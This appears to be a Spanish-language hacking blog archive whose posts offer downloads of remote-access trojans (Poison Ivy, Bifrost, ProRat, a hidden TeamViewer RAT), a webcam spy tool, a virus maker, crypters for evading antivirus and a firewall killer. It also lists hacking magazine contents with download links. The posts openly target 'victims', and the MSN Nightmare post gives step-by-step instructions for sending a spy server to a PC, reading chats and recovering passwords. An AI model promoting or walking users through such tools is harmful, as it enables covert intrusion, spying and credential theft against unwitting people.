TEAM VIEWER RAT
Al ejecutar el archivo que les genera TeamViewer Rat, este extrae y ejecuta TeamViewer, además de mantenerlo totalmente oculto, gracias a un Stub que funciona de forma paralela a este, y al querer mostrarse una ventana de este programa, es ocultada automáticamente. Tambien fue necesario modificar el programa directamente para que no de otro tipo de alertas (por ejemplo, la ventana que aparece en la derecha-abajo al recibir una conexión.)
TeamViewer tiene la opción de elegir la contraseña que será usada para conectarse, pero había que idearse una forma de cómo obtener el ID, entonces en el stub se agrega una función que, captura de forma automática el ID, para luego ser subido junto con la contraseña elegida al ftp que el usuario selecciono en la interfaz de TeamViewer Rat. Esto realmente podría ser una nueva forma de "infectar" es totalmente segura, fácil de utilizar, no se requieren no-ip, y lo mejor de todo es excelentemente rápido, se puede ver el escritorio remoto en tiempo real!!! ( además del administrador de archivos que incluye)
Descargar Aqui!!!
Publicadas por Unknown a la/s 9:05 p. m. 0 comentarios
TEAM VIEWER 5.0
Descargar Aqui!!!
Publicadas por Unknown a la/s 9:01 p. m. 0 comentarios
LOGMEIN TROYANIZADO
Esta utilidad es re util a la hora de hackear un PC si logran meterlo en el pc host podran lograr de todo desde contralarlo remotamente hasta obtener una shell remota !!!!
Descargar Aqui!!!
Publicadas por Unknown a la/s 8:56 p. m. 0 comentarios
REMOTE WEBCAM
MODO DE USO:
Para ver las imagenes de la camara web de tu victima debes ejecutar el remote webcam e ingresar la direccion IP su computador. Usas el private Ip. Y por ultimo insertas la ip en el Remote webcam.
una vez te encuentres conectado el programa comienza a enviar las imagenes. El programa cuenta con la opcionn de modificar el tiempo de envio de imagenes, si tienes una conexion lenta de Internet aumenta el intervalo de tiempo en el que se enviaran las ¡magenes.
Descargar Aqui!!!
Publicadas por Unknown a la/s 8:48 p. m. 0 comentarios
NMAP 5.21
Esto Nos puede ser muy util a la hora de elavorar nuestros troyanos ya que nos permite escanear los puertos TCP/UDP que tengamos abiertos!!.
Descargar Aqui!!!
Publicadas por Unknown a la/s 7:41 p. m. 0 comentarios
TERABIT VIRUS MAKER 3.1
PD: Cuando creen el virus no se olviden de pasarle el themida para hacerlo indetectable.
Descargar Aqui!!!
Publicadas por Unknown a la/s 12:03 p. m. 1 comentarios
PRORAT V1.9
Descargar Aqui!!!
Publicadas por Unknown a la/s 12:00 p. m. 0 comentarios
POISON IVY 2.3.2
Descargar Aqui!!!
Publicadas por Unknown a la/s 11:56 a. m. 0 comentarios
NETCAT, LA NAVAJA SUIZA DE TCP/IP
Para lograr un mejor funcionamiento copiar el NC en /Windows/System32 asi el CMD lo reconosera como un comando externo.
Descargar Aqui!!!
Publicadas por Unknown a la/s 11:50 a. m. 0 comentarios
SCHWARZE SONNE RAT 0.7
- Stop / Pausa / Continuar Transferencias
- Notificador (se puede elegir en Settings)
- Se mejoro la manifestacion de UAC en Windows Vista / 7 compitability
- Varias correcciones de errores
Descargar Aqui!!!
Publicadas por Unknown a la/s 11:45 a. m. 0 comentarios
MSN NIGHTMARE
Características:
- Espiar conversaciones de MSN Messenger
- Intervenir en una conversación suplantando al PC remoto
- Evitar recepción y envió de mensajes
- Recuperación de passwords del Messenger (en el registro y por keylogger)
- Explorar/Ejecutar/Eliminar/Subir/Descargar archivos remotos
- Desinstalar remotamente
- Shell Inversa
- Pequeña utilidad para comprobar si tienes los puertos del router abiertos
- Función subir Log de conversaciones y passwords a ftp para no tener que abrir puertos
- Conexión sin necesidad de determinar IPS
Una explicacion de como se usa:
1- Ejecuta el msnNightmare.exe
2- Dale a port tester introduce 6611 y presiona comprobar
2a- Si te ha salido que el puerto está abierto todo correcto, pasa al punto 3
2b- Si te ha salido que el puerto está cerrado abrelo en tu router (google=nombre de tu router + "abrir puertos"
2c- Si te ha salido que el puerto está ocupado cierra todos los programas que conecten a internet
y todas las ventanas de msnNightmare menos la principal y vuelve a intentarlo
2d- Si estás seguro de que están los puertos abiertos pero te sigue informando de que están cerrados no hagas caso, el porttest no funciona en todos los equipos.
3- Haz lo mismo con el puerto 1111
4a- Presiona Crear
4b- Introduce un nombre cualquiera para identificarlo cuando conecte
4c- Introduce un servidor de irc por ejemplo:
4d- irc.irc-hispano.org
4e- irc.irc-domain.org
(No se si es legal utilizar los servidores que pongo de ejemplo, bajo tu responsabilidad!)
4f- Guardalo donde quieras
5- Instala o envia el exe que acabas de guardar al pc que quieres controlar/espiar
6- DESPUES DE QUE SE EJECUTE EL EXE TIENES QUE ESPERAR A QUE SE REINICIE EL MESSENGER
7- Una vez ejecutado (no muestra ningún mensaje ni nada) si el messenger está en ejecución
se cerrará y en la ventana principal del msnNightmare aparecerá el contacto como conectado
8- Doble click encima del contacto conectado y verás que en un momento te aparece debajo
a la derecha "conectado 4/4" y te aparecerán todas las conversaciones que se han producido
mientras estabas desconectado y después irán apareciendo las conversaciones en tiempo real
9- Ya puedes espiar/suplantar/recuperarpasswords/manejar archivos/conseguir shell..
Descargar Aqui!!!
Publicadas por Unknown a la/s 11:19 p. m. 0 comentarios
BIFROST 1.2.1 ESPAÑOL
El Bifrost se trata de un troyano de conexion inversa, es decir, que el server, una vez alojado en la Pc de nuestra victima, se conecta a nosotros para poder controlar su ordenador.
Descargar Aqui!!!
Publicadas por Unknown a la/s 10:16 p. m. 0 comentarios
WINLICENSE FULL
Winlicense nos permite librarnos de la ardua tarea de añadir a las aplicaciones que distribuimos una buena protección ante ingeniería inversa y la piratería.
Este programa es similar al themida pero nos ofrece mayor variedad de opciones y mayor eficacia al encriptar nuestros servers!!!.
Descargar Aqui!!!
Publicadas por Unknown a la/s 10:12 p. m. 0 comentarios
THEMIDA FULL
Proporcionar una protección fiable y segura a nuestras aplicaciones difícilmente podía ser más sencillo gracias a programas como Themida.
Este programa nos ayuda a encriptar los servers de nuestros troyanos y asi dejarlos inmunes a la mayoria de AV!!!.
Descargar Aqui!!!
Publicadas por Unknown a la/s 10:09 p. m. 0 comentarios
TURKOJAN 4
Descargar Aqui!!!!
Publicadas por Unknown a la/s 10:52 p. m. 0 comentarios
FIREWALL KILLERS
Esta vez les traigo algo muy util!!!!!!!!!! apenas para q complementen sus troyanos xD nada mas y nada menos q un kill firewall !!!!!.
Esta pequeña utilidad para los q no saben sirve para matar el firewall de windows y asi dejarnos las puertas libres para ejecutar nuestros troyanos muchas veces tambn destruye el AV (Anti Virus) xD.
Sin mas palabrerias aqui el link!
Descargar Aqui!!!
Publicadas por Unknown a la/s 10:12 p. m. 0 comentarios
ESCANER DE PUERTOS
Aqui les traigo un muy buen escaner de puertos creado por Arhack y asi saber q puertos tiene abierto el firewall de windows para poder configurar sus troyanos xD
Descargar Aqui!!!
Publicadas por Unknown a la/s 9:40 p. m. 0 comentarios
BIFROST 1.2D
facil de configurar, aun detectado por los antivirus lastimosamente pero hay programas como el themida q lo hacen inmune a estos.
Descargar Aqui
Publicadas por Unknown a la/s 1:40 p. m. 0 comentarios
RESOURCE HACKER
Útil para extraer los recursos como iconos, cursores, menús, etc. modificarlos y reemplazarlos por otros, siempre y cuando el nuevo elemento respete el nombre del archivo original.
Esta herramienta en el mundo hacker nos es utila por ejemplo para cambiarle el icono a los servers de nuestros troyanos asi qdaria mas oculto, tambn para cambiarle las caracteristicas etc.
Descargar Aqui !!
Publicadas por Unknown a la/s 12:26 p. m. 0 comentarios
REVISTAS HACK & CRACK COMPLETAS XD
Es una iso con todas las utilidades:
-programas
-pruebas
-preguntas
-31 revistas
Si lo que buscas o sueñas es llegar a ser hacker estas revistas te podrian dar una buena orientada, y aun mejor podrias darte cuenta que no es tan facil llegar a serlo, sin embargo no es imposible!!!
Solo ponle interes y podras lograrlo!!!!!
Aqui les dejo la lista de contenidos (Al final estan los enlaces de descarga) :
1 Cuaderno:
-Crea tu primer troyano indetectable por los antivirus
-FXP:sin limite de velocidad, utilizando conexiones ajenas
-Los secretos del FTP
-Esquivando firewalls
-Pass mode versus port mode
2 Cuaderno:
-Code/decode bug (como hackear servidores paso a paso)
-Ocultacion de ip: primeros pasos
-Aznar al frente de la gestapo digital
3 Cuaderno:
-Ocultando nuestra ip, encadenando proxys
-proxy: ocultando todos nuestros programas tras las cadenas de proxies
-practicas de todo lo aprendido
Cuaderno 4
-Crea tu segundo troyano indetectable e inmune a los antivirus
-Radmin: remote administrator 2.1, un controlador remoto a medida
Cuaderno 5:
-Aprende a compilar, paso obligado antes de explicarte los exploits
-Rootkits, sin defensa posible
-penetracion de sistemas por netbios
-compilacion del netcat con opciones "especiales"
-netbios: un agujero de seguridad no reconocido por microsoft
-La pirateria en internet
Cuaderno 6:
-Curso de visual basic: aprende a programar desde 0
-Ficheros Stream (invisibles, peligrosos y ejecutables)
-Rippeando videos Divx, El rey
-Ocultacion avanzada de ficheros en windows xp
-Listado de puertos y Servicios: imprescindible!!!
-IPHXC: El tercer troyano de hack x crack (parte 1)
-Trasteando con el hardware de una lan
Cuaderno 7:
-Apache, El mejor servidor web
- transforma tu pc en un servidor web
-El cuarto troyano de Hack x Crack: El CCPROXY, un servidor oculto para anonimizar nuestras conexiones
-IPHXC (segunda parte) nuestro tercer troyano
-La inseguridad del protocolo POP3: Capturando las claves de nuestra cuenta de correoLos primeros pasos con IRIS (sniffando la red)
-Accede por Telnet a servidores POP3, entendiendo los protocolos
-Curso de visual basic, segunda entrega
-Rippeando (2ª parte) el audio: AC3 -- MP3 --OGG
-Consigue una cuenta POP3 gratis
Cuaderno 8:
-Linux: Netcat Perl "pipes"
-Reverse shell, burlando al firewall
-Encadenando programas
-Penetracion inversa en PCs remotos
-SMTP: descubre los protocolos de internet
-Apache: Configuracion, comparte ficheros desde tu propio servidor web
-Jugando de nuevo con el NETCAT
-SERIE RAW: protocolos
-Visual Basic: "Arrray de controles" "vectores" "ocx"
Cuaderno 9:
-NMAP: El mejor escaneador de internet: instacion, interfaz grafica, opciones de uso
-Iniciacion al PORT SCANNING
- Tecnicas de "scaneo"
-Serie RAW: IRC - Internet Relay Chat
-Chateando mediante Telnet
-GNU Linux- Permisos de archivo CAT y otros comandos
-APACHE- Modulos y servidores virtuales
-Descubre los protocolos de "la red" con nosotros
-VISUAL BASIC - Creando librerias. Acceso a datos
Cuaderno 10:
-GNU LINUX- Gestion de usuarios, editores de texto: "VI"
-Serie Raw: Conociendo protocolos y su seguridad
-Curso de Visual Basic (V) acceso a datos II,-XML: el futuro de la transferencia de datos
-Apache parte IV, trio de ases: APACHE- PHP- MYSQL
Cuaderno 11:
-Programacion en GNU Linux: Bash Scripting y C
-Serie Raw: entendiendo los protocolos y su seguridad; Raw 5: FTP (File transfer protocol)
-Intrusion en redes de area local, la pesadilla de todo administrador
-Apache parte V: Configura tu servidor apache como servidor proxy
-Validacion de documentos XML: DTD primera parte: creacion de DTDS
-Curso de Visual Basic (VII) IIS Bug exploit: usando el webbrowser
-Augusta Ada Byron, Lady Lovelace (1815-1852) el primer programa
Cuaderno 12:
-Explotando los servidores FTP:atravesando firewalls por ftp: aprende a utilizar los servidores ftp como anonimizadores!!!
-Raw 6: FTP segunda parte
-Servidor Web Apache: Protege tu apache configurandolo de forma segura: restriccion de accesos - autentificacion
- analizando a nuestros visitantes - logs codificacion - HTPASSWD - Cortafuegos
-Visual Studio.net: crea tu propia herramienta de cracking
-Validacion de documentos XML: DTD segunda parte, atributos y elementos
-IIS bug exploit, nuestro primer scanner
-Programacion en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciacion al lenguaje C
Cuaderno 13:
-Manipulacion de documentos XML: El Dom, 1ª parte: teoria del Dom e intterfaz Domdocument
-Programacion en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciacion al lenguaje C
-Curso de Visual Basic: un cliente, una necesidad, tenemos un proyecto (parte I)
-RAW 7: HTTP (Hypertext Transfer Protocol)
-Port Scanning: Escaneando ordenadoros Remotos: tipos de scaneos
Cuaderno 14:
-Curso de PHP, empezamos a programar, PHP (1)
-Serie RAW (8) DNS - Domain Name System
-Curso de Visual Basic, un cliente, una necesidad, un proyecto, (parte II)
-Programacion en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciacion al lenguaje C (III)
-Manipulacion de documentos XML: El Dom 2ª parte. Interfaz XMLDOMNODE (I)
-Tecnicas de Hijacking
Cuaderno 15:
-Curso de PHP (II) Aprende a programar tu propio generador de IPs
-Serie XBOX Life, instalando Linux en una Xbox-RAW 9: MSN (Microsoft Messenger)
-Curso de Visual Basic, Un cliente, una necesidad, un proyecto, (parte III)
-Programacion en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciacion al lenguaje C (IV)
Cuaderno 16:
-Curso PHP: Aprende a manejar ficheros con PHP
-Programacion en GNU Linux, programacion del sistema: El sistema I.P.C.
-Manipulacion de documentos XML: El DOM tercera parte
-Serie XBOX LIFE: EVOLUTION X tu mejor amigo-RAW 10
- NNTP (Usenet)
Cuaderno 17:
-Hackeando un servidor Windows en 40 segundos!!!
-Programacion en GNU Linux: programacion del sistema, el sistema I.P.C (II)
-Curso de TCP/IP, introduccion
-Curso de PHP, (4ª entrega) Aprende a manejar cadenas de texto en PHP
-Serie XBOX LIFE (III) Cambiando el disco duro y parcheando juegos
Cuaderno 18:
-Curso de PHP, manejo de formularios web
-Serie XBOX LIFE (IV) Convirtiendo nuestra xbox en un centro multimedia
-Programacion en GNU Linux, memoria compartida
-Curso de TCP/IP (2ª entrega) El protocolo de transporte UDP (protocolo de datagramas de usuario)
-El lenguaje XSL, transformacion del documento XML
-La realidad de los virus informaticos
Cuaderno 19:
-Programacion en Gnu Linux, colas de mensajes-XBOX LIFE V
- Jugando online gratis
-Crackeando las restricciones de seguridad de windows
-Curso de seguridad en redes - IDS-Curso de PHP
- Aprende a manejar sockets con PHP
Cuaderno 20:
-Curso de PHP: Aprende a manejar sesiones
-Curso de TCP/IP (3ª entrega) TCP, 1ª parte-XBOX LIFE VI, Menu X
-Curso de seguridad en redes - IDS (II)
Cuaderno 21:
-Trabajando con bases de datos en PHP
-Curso de TCP/IP: 4ª entrega: TCP 2ª parte
-IDS, Sistema de Deteccion de Intrusos, tercera entrega, pluggins de salida en SNORT
-XBOX LIFE VII, Creando nuestro Slayer
Cuaderno 22:
-Asaltando foros: guia paso a paso
-Firewalls: Que son, como funcionan y como saltarselos
Cuaderno 23:
-Como explotar fallos Buffer Overflow
-Curso de TCP/IP: ICMP (protocolo de mensajes de control de internet)
-Diseño de cortafuegos (parte II)
Cuaderno 24:
-Los bugs y los exploits, esos pequeños bichos y diablos
-Curso de TCP/IP: La capa IP primera parte. Las direcciones IP
-Hacking de Linux
-Diseño de cortafuegos de red con iptables (3ª parte del curso de firewalls)
Cuaderno 25:
-Los bugs y los exploits, esos pequeños bichos y diablos, segunda parte
-Vulnerabilidades Web, atacando la sesion de usuario
-Curso de TCP IP: La capa IP, segunda parte, (los datagramas)
Cuaderno 26:
-Sombras en internet: sniffando la red - formas de deteccion
- utilidades para la deteccion -ethereal: descripcion. Capturando trafico. Estableciendo filtros. Capturando informacion sensible. Telnet vs Secure shell
-Atacando la cacha DNS
-Curso de TCP IP: La capa IP 3ª parte: fragmentacion de datagramas
Cuaderno 27:
-Taller de Python "episodio 1"
-Taller de Criptografia - El sistema PGP
-Curso de TCP IP: proteccion con iptables, en una red corporativa
-Buffer Overflow-Hackeando el nucleo
Cuaderno 28:
-Hacking Estragegia, capitulo 1
-Curso de Python, capitulo 2
-Investigacion, poniendo a prueba el antivirus
-Explotando Heap/BSS Overflows, capitulo 2
-Programacion, curso de C, capitulo 1
-Taller de criptografia, capitulo 2
-La "ley de la mordaza": informar es DELITO
Cuaderno 29:
-Hacking estrategia: infiltracion en una red wireless protegida
-Capitulo III: Taller de criptografia
-Control de Logs en GNU/LINUX
-Explotacion de las Format Strings, capitulo III-Shatter Attacks
-Curso de C, capitulo II
-FAQ, curiosidades de Gmail/Google
Cuaderno 30:
-Taller de criptografIa, capitulo IV
-Ataques a formularios web-Los secretos del protocolo SOCKS
-Creamos una Shellcode paso a paso
-Capitulo III: Curso de C: Punteros y Arrays
-Hack mundial
Enlances:
http://www.mediafire.com/?zydtmt3mbhd
http://www.mediafire.com/?m2ldz1wm2yz
http://www.mediafire.com/?zkzjm1znhog
http://www.mediafire.com/?g04i2nh32iz
http://www.mediafire.com/?nr5oz2ykmd0
Publicadas por Unknown a la/s 5:10 p. m. 0 comentarios